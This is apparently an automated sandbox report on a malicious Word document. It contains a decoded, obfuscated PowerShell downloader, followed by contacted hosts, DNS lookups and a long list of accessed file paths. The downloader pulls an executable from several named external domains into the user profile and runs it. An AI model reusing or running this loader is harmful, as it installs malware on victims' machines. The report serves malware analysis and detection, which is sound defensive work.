ADUANAA2AD0AJwBGADQAMgAwAF8AMAAnADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0ASQAnACsAJwB0AGUAbQAnACkAIAAkAEkAMwA3ADUANAA0ADkAKQAuAEwAZQBuAEcAVABIACAALQBnAGUAIAAyADkANQAzADMAKQAgAHsALgAoACcASQBuAHYAJwArACcAbwBrAGUAJwArACcALQBJAHQAZQBtACcAKQAgACQASQAzADcANQA0ADQAOQA7ACQAcgA3ADQANgAyADYAPQAnAGkAOQAwADMANwAyADMAJwA7AGIAcgBlAGEAawA7ACQAaAAxADUAOAA4ADgAPQAnAEQAMwA0ADcAOAAzACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFIAOAAzADUAMwAzADUAPQAnAGoAOQAyADAANgAyACcA
decoded_base64_string: $\x00c\x006\x007\x009\x004\x005\x007\x006\x00=\x00'\x00M\x007\x008\x008\x007\x000\x002\x003\x00'\x00;\x00$\x00a\x006\x000\x008\x009\x000\x006\x00 \x00=\x00 \x00'\x005\x003\x001\x00'\x00;\x00$\x00P\x006\x007\x000\x005\x004\x007\x00=\x00'\x00h\x001\x001\x003\x002\x000\x000\x00'\x00;\x00$\x00I\x003\x007\x005\x004\x004\x009\x00=\x00$\x00e\x00n\x00v\x00:\x00u\x00s\x00e\x00r\x00p\x00r\x00o\x00f\x00i\x00l\x00e\x00+\x00'\x00\\x00'\x00+\x00$\x00a\x006\x000\x008\x009\x000\x006\x00+\x00'\x00.\x00e\x00x\x00e\x00'\x00;\x00$\x00I\x000\x009\x007\x009\x004\x001\x000\x00=\x00'\x00p\x007\x007\x00_\x008\x002\x00'\x00;\x00$\x00q\x007\x008\x004\x00_\x004\x004\x00=\x00&\x00(\x00'\x00n\x00e\x00w\x00-\x00o\x00b\x00'\x00+\x00'\x00j\x00'\x00+\x00'\x00e\x00c\x00t\x00'\x00)\x00 \x00N\x00`\x00e\x00`\x00T\x00.\x00w\x00E\x00b\x00c\x00`\x00l\x00`\x00I\x00e\x00N\x00t\x00;\x00$\x00l\x00_\x007\x003\x002\x006\x00=\x00'\x00h\x00t\x00t\x00p\x00s\x00:\x00/\x00/\x00k\x00s\x00i\x00c\x00a\x00r\x00d\x00o\x00.\x00c\x00o\x00m\x00/\x00t\x00r\x00a\x00v\x00e\x00l\x00/\x00n\x00t\x00K\x00W\x00z\x00I\x00y\x00D\x00l\x00/\x00@\x00h\x00t\x00t\x00p\x00:\x00/\x00/\x00i\x00a\x00m\x00z\x00b\x00.\x00c\x00o\x00m\x00/\x00a\x00s\x00p\x00n\x00e\x00t\x00_\x00c\x00l\x00i\x00e\x00n\x00t\x00/\x00s\x00y\x00s\x00t\x00e\x00m\x00_\x00w\x00e\x00b\x00/\x00G\x00A\x00A\x00f\x00R\x00Z\x00M\x00q\x00/\x00@\x00h\x00t\x00t\x00p\x00:\x00/\x00/\x00m\x00a\x00l\x00o\x00n\x00i\x00n\x00c\x00.\x00c\x00o\x00m\x00/\x00a\x00p\x00p\x00s\x00/\x00G\x00b\x00B\x00Z\x00o\x00m\x00Q\x00j\x00S\x00/\x00@\x00h\x00t\x00t\x00p\x00:\x00/\x00/\x00k\x00u\x00m\x00a\x00k\x00u\x00n\x00.\x00c\x00o\x00m\x00/\x007\x00j\x00e\x00t\x00/\x003\x00b\x002\x004\x004\x006\x007\x002\x00z\x00e\x00_\x00b\x00t\x00u\x00m\x00n\x00c\x000\x00h\x00-\x002\x001\x007\x008\x008\x009\x006\x00/\x00@\x00h\x00t\x00t\x00p\x00s\x00:\x00/\x00/\x00i\x00n\x00g\x00e\x00g\x00n\x00e\x00r\x00i\x00a\x00d\x00e\x00l\x00w\x00e\x00b\x00.\x00c\x00o\x00m\x00/\x00f\x00a\x00n\x00t\x00a\x00c\x00a\x00l\x00c\x00i\x00o\x00/\x008\x006\x001\x001\x00l\x00j\x00o\x00o\x00_\x00o\x004\x00y\x000\x002\x003\x00w\x00-\x003\x007\x005\x004\x007\x000\x004\x003\x007\x001\x00/\x00'\x00.\x00S\x00P\x00L\x00I\x00t\x00(\x00'\x00@\x00'\x00)\x00;\x00$\x00w\x000\x00_\x002\x00_\x003\x003\x004\x00=\x00'\x00U\x006\x008\x001\x009\x004\x005\x00'\x00;\x00f\x00o\x00r\x00e\x00a\x00c\x00h\x00(\x00$\x00W\x00_\x004\x006\x007\x001\x001\x008\x00 \x00i\x00n\x00 \x00$\x00l\x00_\x007\x003\x002\x006\x00)\x00{\x00t\x00r\x00y\x00{\x00$\x00q\x007\x008\x004\x00_\x004\x004\x00.\x00D\x00o\x00W\x00n\x00L\x00o\x00A\x00d\x00F\x00i\x00L\x00E\x00(\x00$\x00W\x00_\x004\x006\x007\x001\x001\x008\x00,\x00 \x00$\x00I\x003\x007\x005\x004\x004\x009\x00)\x00;\x00$\x00n\x008\x004\x000\x007\x005\x004\x006\x00=\x00'\x00F\x004\x002\x000\x00_\x000\x00'\x00;\x00I\x00f\x00 \x00(\x00(\x00&\x00(\x00'\x00G\x00e\x00t\x00-\x00I\x00'\x00+\x00'\x00t\x00e\x00m\x00'\x00)\x00 \x00$\x00I\x003\x007\x005\x004\x004\x009\x00)\x00.\x00L\x00e\x00n\x00G\x00T\x00H\x00 \x00-\x00g\x00e\x00 \x002\x009\x005\x003\x003\x00)\x00 \x00{\x00.\x00(\x00'\x00I\x00n\x00v\x00'\x00+\x00'\x00o\x00k\x00e\x00'\x00+\x00'\x00-\x00I\x00t\x00e\x00m\x00'\x00)\x00 \x00$\x00I\x003\x007\x005\x004\x004\x009\x00;\x00$\x00r\x007\x004\x006\x002\x006\x00=\x00'\x00i\x009\x000\x003\x007\x002\x003\x00'\x00;\x00b\x00r\x00e\x00a\x00k\x00;\x00$\x00h\x001\x005\x008\x008\x008\x00=\x00'\x00D\x003\x004\x007\x008\x003\x00'\x00}\x00}\x00c\x00a\x00t\x00c\x00h\x00{\x00}\x00}\x00$\x00R\x008\x003\x005\x003\x003\x005\x00=\x00'\x00j\x009\x002\x000\x006\x002\x00'\x00
Uses suspicious command line tools or Windows utilities
command: "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R8OP9ZJC\INC_655521240103US_May_14_2019[1].doc"

Screenshots


Hosts

Direct IP Country Name
Y 8.8.8.8 [VT] United States
N 204.79.197.200 [VT] United States
N 185.66.41.16 [VT] Spain
N 184.168.27.40 [VT] United States
N 132.148.196.134 [VT] United States

DNS

Name Response Post-Analysis Lookup
www.bing.com [VT] CNAME a-0001.a-afdentry.net.trafficmanager.net [VT]
A 204.79.197.200 [VT]
CNAME a-0001.a-msedge.net [VT]
A 13.107.21.200 [VT]
test5.freebottlepc.com [VT] A 132.148.196.134 [VT]
ksicardo.com [VT] A 185.66.41.16 [VT]
iamzb.com [VT] A 184.168.27.40 [VT]

Summary

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{7531C624-7656-11E9-A15D-000C29BA3DA7}.dat
C:\Program Files (x86)\Internet Explorer\ieproxy.dll
C:\Users\user\AppData\Local\Temp\~DF80447823E3B1CDC0.TMP
C:\Windows\SysWOW64\propsys.dll
C:\Windows\sysnative\propsys.dll
C:\Windows\System32\url.dll
C:\Users\user\Favorites\Links
C:\
C:\Users
C:\Users\user\AppData\Local\Microsoft\Windows\Caches
C:\Users\user\AppData\Local\Microsoft\Windows\Caches\cversions.1.db
C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000d.db
C:\Users\desktop.ini
\??\MountPointManager
C:\Users\user
C:\Users\user\Favorites
C:\Users\user\Favorites\desktop.ini
C:\Users\user\Desktop\desktop.ini
C:\Users\user\Favorites\Links\desktop.ini
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\frameiconcache.dat
C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIE.dll
C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIELinkedNotes.dll
C:\Windows\SysWOW64\en-US\MSCTF.dll.mui
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{7531C625-7656-11E9-A15D-000C29BA3DA7}.dat
C:\Users\user\AppData\Local\Temp\~DF3CDA1F11F8A81DB4.TMP
C:\Users\user\Favorites\Links\Web Slice Gallery.url
C:\Users\user\AppData\Local\Microsoft\Feeds
C:\Users\user\AppData\Local\Microsoft\Feeds\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\WebSlices~
C:\Users\user\AppData\Local\Microsoft\Feeds\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~
C:\Windows\SysWOW64\ieframe.dll
C:\Windows\SysWOW64\stdole2.tlb
C:\Program Files (x86)\Internet Explorer\url.dll
C:\Users\user\Desktop\url.dll
C:\Users\user\AppData\LocalLow\Microsoft\Internet Explorer\Services\
C:\ProgramData\Microsoft\Network\Connections\Pbk\rasphone.pbk
C:\ProgramData\Microsoft\Network\Connections\Pbk\*.pbk
C:\Windows\System32\ras\*.pbk
C:\Users\user\AppData\Roaming\Microsoft\Network\Connections\Pbk\rasphone.pbk
C:\Users\user\AppData\Roaming\Microsoft\Network\Connections\Pbk\*.pbk
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R8OP9ZJC\favicon[1].ico
C:\Users\user\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\28c8b86deab549a1.customDestinations-ms
\Device\KsecDD
C:\Windows\Globalization\Sorting\sortdefault.nls
C:\Program Files (x86)\Internet Explorer\IEShims.dll
C:\Windows\SysWOW64\shell32.dll
C:\Program Files (x86)\Internet Explorer\sqmapi.dll
C:\Users\user\AppData\Local\Microsoft\Feeds Cache\
C:\Users\user\AppData\Local\Microsoft\Feeds Cache\index.dat
C:\Users\user\AppData\Local\Microsoft\Feeds Cache\desktop.ini
C:\Windows\Fonts\staticcache.dat
C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll
C:\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\msvcr80.dll
C:\Windows
C:\Windows\winsxs
C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelper.dll
C:\Program Files (x86)\Internet Explorer\iexplore.exe.Local\
C:\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc
C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL
C:\Windows\AppPatch\sysmain.sdb
C:\Program Files (x86)\Microsoft Office\Office14\
C:\Program Files (x86)
C:\Program Files (x86)\Microsoft Office
C:\Program Files (x86)\Microsoft Office\Office14
C:\Program Files (x86)\Microsoft Office\Office14\*.*
C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll
C:\Program Files (x86)\Java\jre7\bin\java.exe
C:\Program Files (x86)\Java\jre7\bin\client\jvm.dll
C:\Program Files (x86)\Java\jre7\bin\server\jvm.dll
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R8OP9ZJC\INC_655521240103US_May_14_2019[1].doc
C:\Windows\SysWOW64\urlmon.dll
C:\Windows\SysWOW64
\??\PIPE\samr
C:\DosDevices\pipe\
C:\Windows\winsxs\x86_microsoft.windows.c..-controls.resources_6595b64144ccf1df_6.0.7600.16385_en-us_581cd2bf5825dde9
C:\Windows\winsxs\x86_microsoft.windows.c..-controls.resources_6595b64144ccf1df_6.0.7600.16385_en-us_581cd2bf5825dde9\comctl32.dll.mui
C:\Windows\Installer\{90140000-003D-0000-0000-0000000FF1CE}\wordicon.exe
C:\Users\user\AppData
C:\Users\user\AppData\Local
C:\Users\user\AppData\Local\Microsoft\Windows
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R8OP9ZJC
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
C:\Program Files (x86)\Windows Defender\MpClient.dll
C:\Program Files (x86)\Windows Defender\MsMpLics.dll
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R8OP9ZJC\INC_655521240103US_May_14_2019[1].doc:Zone.Identifier
C:\Users\user\Searches
C:\Users\user\Searches\desktop.ini
C:\Users\user\Videos
C:\Users\user\Videos\desktop.ini
C:\Users\user\Pictures
C:\Users\user\Pictures\desktop.ini
C:\Users\user\Desktop
C:\Users\user\Contacts
C:\Users\user\Contacts\desktop.ini
C:\Users\user\Music
C:\Users\user\Music\desktop.ini
C:\Users\user\Downloads
C:\Users\user\Downloads\desktop.ini
C:\Users\user\Documents
C:\Users\user\Documents\desktop.ini
C:\Users\user\Links
C:\Users\user\Links\desktop.ini
C:\Users\user\Saved Games
C:\Users\user\Saved Games\desktop.ini
C:\Windows\System32\shdocvw.dll
C:\Windows\System32\
C:\Windows\SysWOW64\shdocvw.dll
C:\Windows\System32
C:\Windows\System32\*.*
C:\Windows\System32\en-US\shdocvw.dll.mui
C:\Program Files (x86)\Common Files\Microsoft Shared\Filters\odffilt.dll
C:\Program Files (x86)\Microsoft Office\Office14\GKWord.dll
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\MSO.DLL
C:\Program Files (x86)\Microsoft Office\Office14\OUTLFLTR.DLL
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\EXP_PDF.DLL
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\EXP_XPS.DLL
C:\Windows\SysWOW64\FM20.DLL
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\Csi.dll
C:\Program Files (x86)\Microsoft Office\Office14\MSOSTYLE.DLL
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\RICHED20.DLL
C:\Program Files (x86)\Microsoft Office\Office14\SAEXT.DLL
C:\Program Files (x86)\Microsoft Office\Office14\EntityPicker.dll
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\Cultures\OFFICE.ODF
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\MSPTLS.DLL
C:\Program Files (x86)\Microsoft Office\Office14\EntityDataHandler.dll
C:\Windows\winsxs\manifests\x86_microsoft.vc90.atl_1fc8b3b9a1e18e3b_9.0.30729.4148_none_51ca66a2bbe76806.manifest
C:\Windows\winsxs\x86_microsoft.vc90.atl_1fc8b3b9a1e18e3b_9.0.30729.4148_none_51ca66a2bbe76806\
C:\Windows\winsxs\x86_microsoft.vc90.atl_1fc8b3b9a1e18e3b_9.0.30729.4148_none_51ca66a2bbe76806\ATL90.dll
C:\Windows\winsxs\manifests\x86_policy.9.0.microsoft.vc90.atl_1fc8b3b9a1e18e3b_9.0.30729.4148_none_f0efb442f8a0f46c.manifest
C:\Windows\winsxs\manifests\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4148_none_5090ab56bcba71c2.manifest
C:\Windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4148_none_5090ab56bcba71c2\
C:\Windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4148_none_5090ab56bcba71c2\msvcr90.dll
C:\Windows\winsxs\manifests\x86_policy.9.0.microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4148_none_f47e1bd6f6571810.manifest
C:\Windows\winsxs\manifests\x86_microsoft.vc90.mfc_1fc8b3b9a1e18e3b_9.0.30729.4148_none_4bf5400abf9d60b7.manifest
C:\Windows\winsxs\x86_microsoft.vc90.mfc_1fc8b3b9a1e18e3b_9.0.30729.4148_none_4bf5400abf9d60b7\
C:\Windows\winsxs\x86_microsoft.vc90.mfc_1fc8b3b9a1e18e3b_9.0.30729.4148_none_4bf5400abf9d60b7\mfc90.dll
C:\Windows\winsxs\manifests\x86_policy.9.0.microsoft.vc90.mfc_1fc8b3b9a1e18e3b_9.0.30729.4148_none_ecff360cfb2594f3.manifest
C:\Windows\winsxs\manifests\x86_microsoft.vc90.mfcloc_1fc8b3b9a1e18e3b_9.0.30729.4148_none_4973eb1d754a9dc9.manifest
C:\Windows\winsxs\x86_microsoft.vc90.mfcloc_1fc8b3b9a1e18e3b_9.0.30729.4148_none_4973eb1d754a9dc9\
C:\Windows\winsxs\x86_microsoft.vc90.mfcloc_1fc8b3b9a1e18e3b_9.0.30729.4148_none_4973eb1d754a9dc9\MFC90CHT.DLL
C:\Windows\winsxs\manifests\x86_policy.9.0.microsoft.vc90.mfcloc_1fc8b3b9a1e18e3b_9.0.30729.4148_none_f0bcaee084e72e5d.manifest
C:\Program Files (x86)\Microsoft Office\Office14\OART.DLL
C:\Program Files (x86)\Microsoft Office\Office14\GFX.DLL
C:\Program Files (x86)\Microsoft Office\Office14\OIMG.DLL
C:\Program Files (x86)\Common Files\Microsoft Shared\Portal\PortalConnectCore.dll
C:\Program Files (x86)\Internet Explorer\iexplore.exe
C:\Windows\winsxs\FileMaps\program_files_x86_microsoft_office_office14_295527d9bd5a393d.cdf-ms
C:\Windows\AppPatch\pcamain.sdb
C:\Users\Public\Desktop
C:\Users\Public
C:\Users\Public\desktop.ini
C:\Users\Public\Desktop\desktop.ini
C:\Users\user\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\Links
C:\Windows\sysnative\ieframe.dll
C:\Users\user\{1777F761-68AD-4D8A-87BD-30B759FA33DD}
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
C:\Program Files (x86)\desktop.ini
C:\Program Files (x86)\Internet Explorer\iexplore.exe.Manifest
C:\program files (x86)\internet explorer\iexplore.exe
C:\program files (x86)\internet explorer\en-US\iexplore.exe.mui
C:\Windows\sysnative\Branding\Shellbrd\Shellbrd.dll
C:\Windows\Branding\ShellBrd\shellbrd.dll
C:\Users\user\AppData\Local\Temp\
C:\Users\user\AppData\Local\Temp
C:\Users\user\Desktop\CapeOutput.bin
C:\Users\Public\Desktop\CapeOutput.bin
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu
C:\Users\user\AppData\Roaming
C:\Users\user\AppData\Roaming\Microsoft
C:\Users\user\AppData\Roaming\Microsoft\desktop.ini
C:\Users\user\AppData\Roaming\Microsoft\Windows
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
C:\ProgramData\Microsoft\Windows\Start Menu
C:\ProgramData
C:\ProgramData\Microsoft
C:\ProgramData\Microsoft\desktop.ini
C:\ProgramData\Microsoft\Windows
C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch
C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini
C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
C:\Program Files (x86)\Microsoft Office\Office14\ONENOTE.EXE
C:\Program Files (x86)\Microsoft Office\Office14\OUTLOOK.EXE
C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE
C:\Program Files (x86)\Microsoft Office\Office14\MSTORE.EXE
C:\Program Files (x86)\Microsoft Office\Office14\OIS.EXE
C:\Python27\pythonw.exe
C:\Python27\python.exe
C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\
C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\slideshow.ini
C:\Windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\msvcr90.dll
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE.3.Manifest
C:\Program Files (x86)\Microsoft Office\Office14\WWLIB.DLL
C:\Program Files (x86)\Microsoft Office\Office14\WTSAPI32.dll
C:\Windows\System32\wtsapi32.dll
C:\Program Files (x86)\Microsoft Office\Office14\MSIMG32.dll
C:\Windows\System32\msimg32.dll
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE.Local\
C:\Windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742
C:\Program Files (x86)\Microsoft Office\Office14\msi.dll
C:\Windows\System32\msi.dll
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\
C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\MSO.DLL
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\*.*
C:\Users\user\AppData\Local\Temp\CVR867E.tmp
C:\Users\user\AppData\Local\Temp\CVR867E.tmp.cvr
C:\Program Files (x86)\Microsoft Office\Office14\1033\WWINTL.DLL
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\1033\MSOINTL.DLL
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\MSORES.DLL
C:\Users\user\AppData\Roaming\Microsoft\Templates\
C:\Users\user\AppData\Roaming\Microsoft\Templates
C:\Windows\System32\mscoree.dll.local
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll
C:\Windows\Microsoft.NET\Framework\*
C:\Windows\Microsoft.NET\Framework\v1.0.3705\clr.dll
C:\Windows\Microsoft.NET\Framework\v1.0.3705\mscorwks.dll
C:\Windows\Microsoft.NET\Framework\v1.1.4322\clr.dll
C:\Windows\Microsoft.NET\Framework\v1.1.4322\mscorwks.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\clr.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE.config
C:\Program Files (x86)\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPC.DLL
C:\Program Files (x86)\Microsoft Office\Office14\Normal.dotm
C:\Users\user\AppData\Roaming\Microsoft\Templates\Normal.dotm
C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{C39F9907-C8C6-4EF6-94D3-79DF1B9337A2}.tmp
C:\Users\user\AppData\Local\Microsoft\Office\
C:\Users\user\AppData\Local\Microsoft\Office\Word.officeUI
C:\Users\user\AppData\Roaming\
C:\Users\user\AppData\Roaming\Microsoft\AddIns\
C:\Users\user\AppData\Local\
C:\Users\user\AppData\Local\Microsoft\Office\Word14.customUI
C:\Users\user\AppData\Roaming\Microsoft\Word\STARTUP\
C:\Users\user\AppData\Roaming\Microsoft\Word\STARTUP\*.*
C:\Program Files (x86)\Microsoft Office\Office14\STARTUP\*.*
C:\Users\user\AppData\Local\Microsoft
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\desktop.ini
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\desktop.ini
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R8OP9ZJC\desktop.ini
C:\Users\user\AppData\Local\Temp\~DFABD4D4152FD0DE55.TMP
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R8OP9ZJC\~$C_655521240103US_May_14_2019[1].doc
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{22959652-52D5-44BE-B483-E544AA5735B7}.tmp
C:\Users\user\AppData\Roaming\Microsoft\Office\
C:\Users\user\AppData\Roaming\Microsoft\Office\review.rcd
C:\Users\user\AppData\Roaming\Microsoft\Office\adhoc.rcd
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\USP10.DLL
C:\Program Files (x86)\Microsoft Office\Office14\MSWORD.OLB
C:\Program Files (x86)\Common Files\microsoft shared\VBA\VBA7\VBE7.DLL
C:\Program Files (x86)\Common Files\microsoft shared\VBA\VBA7\1033\VBE7INTL.DLL
C:\Windows\sysnative\C_932.NLS
C:\Windows\sysnative\C_949.NLS
C:\Windows\sysnative\C_950.NLS
C:\Windows\sysnative\C_936.NLS
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{0960D407-C226-4B14-8EF4-4D7DE39EC6D6}.tmp
C:\Users\user\AppData\Local\Temp\Word8.0
C:\Program Files (x86)\Common Files\microsoft shared\VBA\VBA7\VBE7.DLL\3
C:\Users\user\AppData\Local\Temp\VBE
C:\Windows\SysWOW64\
C:\Users\user\AppData\Local\Temp\Word8.0\MSForms.exd
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8588CCBC.wmf
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\47E14D8D.wmf
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FE1C1E2A.wmf
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D8C4423.wmf
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3AB067C8.wmf
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\66D6F529.wmf
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CF99C916.wmf
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7413FA1F.wmf
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\47B30D94.wmf
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4EF4A885.wmf
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F28E8CC2.wmf
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DC4471DB.wmf
C:\Windows\System32\wbem\wbemdisp.tlb
C:\Users\user\AppData\Local\Microsoft\Schemas\MS Word_restart.xml
C:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80
C:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\GdiPlus.dll
C:\Users\user\AppData\Local\GDIPFONTCACHEV1.DAT
C:\Windows\Fonts\ahronbd.ttf
C:\Windows\Fonts\arial.ttf
C:\Windows\Fonts\arialbd.ttf
C:\Windows\Fonts\ariali.ttf
C:\Windows\Fonts\arialbi.ttf
C:\Program Files (x86)\Microsoft Office\Office14\usp10.DLL
C:\Program Files (x86)\Microsoft Office\Office14\PROOF\MSSP7ES.DLL
C:\Program Files (x86)\Microsoft Office\Office14\PROOF\MSSP7ES.LEX
C:\Program Files (x86)\Microsoft Office\Office14\PROOF\MSSP7FR.DLL
C:\Program Files (x86)\Microsoft Office\Office14\PROOF\MSSP7FR.LEX
C:\Program Files (x86)\Microsoft Office\Office14\PROOF\MSSP7EN.DLL
C:\Program Files (x86)\Microsoft Office\Office14\PROOF\MSSP7EN.LEX
C:\Program Files (x86)\Microsoft Office\Office14\CSS7DATA000A.DLL
C:\Program Files (x86)\Microsoft Office\Office14\NL7MODELS000A.dll
C:\Program Files (x86)\Microsoft Office\Office14\CSS7DATA000C.DLL
C:\Program Files (x86)\Microsoft Office\Office14\NL7MODELS000C.dll
C:\Program Files (x86)\Microsoft Office\Office14\CSS7DATA0009.DLL
C:\Program Files (x86)\Microsoft Office\Office14\NL7MODELS0009.dll
C:\Program Files (x86)\Microsoft Office\Office14\mssp3??.dll
C:\Users\user\AppData\Roaming\Microsoft\Proof\
C:\Users\user\AppData\Roaming\Microsoft\Proof
C:\Users\user\AppData\Roaming\Microsoft\Proof\mssp3??.dll
C:\Program Files (x86)\Common Files\Microsoft Shared\
C:\Program Files (x86)\Common Files\Microsoft Shared
C:\Program Files (x86)\Common Files\Microsoft Shared\mssp3??.dll
C:\Program Files (x86)\Microsoft Office\Office14\mssp??32.dll
C:\Users\user\AppData\Roaming\Microsoft\Proof\mssp??32.dll
C:\Program Files (x86)\Common Files\Microsoft Shared\mssp??32.dll
C:\Program Files (x86)\Microsoft Office\Office14\msp??32.dll
C:\Program Files (x86)\Microsoft Office\Office14\msgr2??.dll
C:\Users\user\AppData\Roaming\Microsoft\Proof\msgr2??.dll
C:\Program Files (x86)\Common Files\Microsoft Shared\msgr2??.dll
C:\Program Files (x86)\Microsoft Office\Office14\msgr??32.dll
C:\Users\user\AppData\Roaming\Microsoft\Proof\msgr??32.dll
C:\Program Files (x86)\Common Files\Microsoft Shared\msgr??32.dll
C:\Program Files (x86)\Microsoft Office\Office14\gram??32.dll
C:\Users\user\AppData\Roaming\Microsoft\Proof\gram??32.dll
C:\Program Files (x86)\Common Files\Microsoft Shared\gram??32.dll
